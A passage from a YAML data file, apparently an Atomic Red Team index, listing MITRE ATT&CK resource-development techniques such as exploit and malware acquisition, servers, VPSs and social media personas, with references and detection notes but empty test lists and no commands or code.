+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:20:40.675Z'
+ created: '2020-10-01T01:05:42.216Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.004
+ url: https://attack.mitre.org/techniques/T1587/004
+ - source_name: NYTStuxnet
+ description: William J. Broad, John Markoff, and David E. Sanger. (2011, January
+ 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved
+ March 1, 2017.
+ url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
+ - source_name: Irongeek Sims BSides 2017
+ url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
+ description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
+ Exploitation. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploits
+ description: |-
+ Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
+
+ As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.
+
+ Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ id: attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T03:09:34.771Z'
+ created: '2020-10-01T01:48:15.511Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on behaviors relating to the use of exploits (i.e.
+ [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190),
+ [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203),
+ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068),
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211),
+ [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212),
+ [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210),
+ and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.005:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.005
+ url: https://attack.mitre.org/techniques/T1588/005
+ - source_name: Exploit Database
+ url: https://www.exploit-db.com/
+ description: Offensive Security. (n.d.). Exploit Database. Retrieved October
+ 15, 2020.
+ - source_name: TempertonDarkHotel
+ description: Temperton, J. (2015, August 10). Hacking Team zero-day used in
+ new Darkhotel attacks. Retrieved March 9, 2017.
+ url: https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ source_name: PegasusCitizenLab
+ - source_name: Wired SandCat Oct 2019
+ url: https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec
+ description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
+ Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
+ October 15, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploits
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
+
+ In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
+
+ An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
+
+ Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ id: attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-18T21:47:09.385Z'
+ created: '2020-10-01T02:17:46.086Z'
+ x_mitre_detection: |2-
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.001
+ url: https://attack.mitre.org/techniques/T1587/001
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: ActiveMalwareEnergy
+ description: Dan Goodin. (2014, June 30). Active malware operation let attackers
+ sabotage US energy industry. Retrieved March 9, 2017.
+ url: https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/
+ - source_name: FBI Flash FIN7 USB
+ url: https://www.losangeles.va.gov/documents/MI-000120-MW.pdf
+ description: Federal Bureau of Investigation, Cyber Division. (2020, March
+ 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection
+ Attacks. Retrieved October 14, 2020.
+ - source_name: FireEye APT29
+ description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
+ a Russian Cyber Threat Group. Retrieved September 17, 2015.'
+ url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Malware
+ description: |-
+ Before compromising a victim, adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors, packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
+
+ As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.
+
+ Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)
+ id: attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T13:05:43.492Z'
+ created: '2020-10-01T01:33:01.433Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.001
+ url: https://attack.mitre.org/techniques/T1588/001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Malware
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
+
+ In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).
+ id: attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-15T20:46:54.437Z'
+ created: '2020-10-01T02:06:11.499Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588
+ url: https://attack.mitre.org/techniques/T1588
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ source_name: PegasusCitizenLab
+ - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ source_name: DiginotarCompromise
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Obtain Capabilities
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
+
+ In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)
+
+ In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:22:21.135Z'
+ created: '2020-10-01T01:56:24.776Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Defense Evasion or Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.004
+ url: https://attack.mitre.org/techniques/T1583/004
+ - source_name: NYTStuxnet
+ description: William J. Broad, John Markoff, and David E. Sanger. (2011, January
+ 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved
+ March 1, 2017.
+ url: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Server
+ description: |-
+ Before compromising a victim, adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
+
+ Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)
+ id: attack-pattern--60c4b628-4807-4b0b-bbf5-fdac8643c337
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-12T16:49:11.340Z'
+ created: '2020-10-01T00:48:09.578Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.004
+ url: https://attack.mitre.org/techniques/T1584/004
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Server
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
+
+ Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
+ id: attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-12T19:48:07.710Z'
+ created: '2020-10-01T00:56:25.135Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585.001
+ url: https://attack.mitre.org/techniques/T1585/001
+ - source_name: NEWSCASTER2014
+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media Accounts
+ description: "Before compromising a victim, adversaries may create and cultivate
+ social media accounts that can be used during targeting. Adversaries can create
+ social media accounts that can be used to build a persona to further operations.
+ Persona development consists of the development of public information, presence,
+ history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation:
+ BlackHatRobinSage)\n\nFor operations incorporating social engineering, the
+ utilization of a persona on social media may be important. These personas
+ may be fictitious or impersonate real people. The persona may exist on a single
+ social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter,
+ etc.). Establishing a persona on social media may require development of
+ additional documentation to make them seem real. This could include filling
+ out profile information, developing social networks, or incorporating photos.
+ \n\nOnce a persona has been developed an adversary can use it to create connections
+ to targets of interest. These connections may be direct or may include trying
+ to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+ These accounts may be leveraged during other phases of the adversary lifecycle,
+ such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."
+ id: attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T17:58:13.557Z'
+ created: '2020-10-01T01:08:41.124Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586.001
+ url: https://attack.mitre.org/techniques/T1586/001
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ - source_name: NEWSCASTER2014
+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media Accounts
+ description: "Before compromising a victim, adversaries may compromise social
+ media accounts that can be used during targeting. For operations incorporating
+ social engineering, the utilization of an online persona may be important.
+ Rather than creating and cultivating social media profiles (i.e. [Social Media
+ Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may
+ compromise existing social media accounts. Utilizing an existing persona may
+ engender a level of trust in a potential victim if they have a relationship,
+ or knowledge of, the compromised persona. \n\nA variety of methods exist for
+ compromising social media accounts, such as gathering credentials via [Phishing
+ for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials
+ from third-party sites, or by brute forcing credentials (ex: password reuse
+ from breach credential dumps).(Citation: AnonHBGary) Prior to compromising
+ social media accounts, adversaries may conduct Reconnaissance to inform decisions
+ about which accounts to compromise to further their operation.\n\nPersonas
+ may exist on a single site or across multiple sites (ex: Facebook, LinkedIn,
+ Twitter, etc.). Compromised social media accounts may require additional development,
+ this could include filling out or modifying profile information, further developing
+ social networks, or incorporating photos.\n\nAdversaries can use a compromised
+ social media profile to create new, or hijack existing, connections to targets
+ of interest. These connections may be direct or may include trying to connect
+ through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised
+ profiles may be leveraged during other phases of the adversary lifecycle,
+ such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."
+ id: attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T17:57:43.708Z'
+ created: '2020-10-01T01:18:35.535Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.002
+ url: https://attack.mitre.org/techniques/T1588/002
+ - source_name: Recorded Future Beacon 2019
+ url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Tool
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
+
+ Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T14:46:37.477Z'
+ created: '2020-10-01T02:08:33.977Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.003
+ url: https://attack.mitre.org/techniques/T1583/003
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtual Private Server
+ description: |-
+ Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
+
+ Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:58:32.476Z'
+ created: '2020-10-01T00:44:23.935Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.003
+ url: https://attack.mitre.org/techniques/T1584/003
+ - source_name: NSA NCSC Turla OilRig
+ url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
+ description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla
+ Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October
+ 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtual Private Server
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
+
+ Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.
+ id: attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:01:45.792Z'
+ created: '2020-10-01T00:55:17.771Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.006
+ url: https://attack.mitre.org/techniques/T1588/006
+ - source_name: National Vulnerability Database
+ url: https://nvd.nist.gov/
+ description: National Vulnerability Database. (n.d.). National Vulnerability
